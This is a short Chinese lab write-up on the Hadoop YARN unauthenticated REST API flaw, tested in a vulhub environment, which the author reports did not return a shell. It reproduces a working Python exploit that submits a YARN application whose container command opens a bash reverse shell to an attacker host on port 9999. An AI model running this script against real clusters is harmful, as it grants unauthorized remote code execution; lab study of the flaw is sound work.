原理
参考 http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf环境启动后,访问http://your-ip:8088
利用脚本:
vulhub/hadoop/unauthorized-yarn/exploit.py at master · vulhub/vulhub (github.com)
#!/usr/bin/env python
import requests
target = 'http://127.0.0.1:8088/'
lhost = '192.168.0.1' # put your local host ip here, and listen at port 9999
url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
'application-id': app_id,
'application-name': 'get-shell',
'am-container-spec': {
'commands': {
'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
},
},
'application-type': 'YARN',
}
requests.post(url, json=data)
target是你的目标主机,也就是有hadoop的主机;
lhost是你要反弹的主机地址,鉴于我所有的环境都是本地环境,相互之间都可以ping通,我在本机上运行该python脚本,然后将target的shell反弹到我另一台centos的主机上。
centos主机进行监听9999端口:
本地运行python文件
hadoop主机有getshell记录:
但是centos主机始终没有反弹shell,我也不知道为什么hadoop已经显示,但是没有反弹shell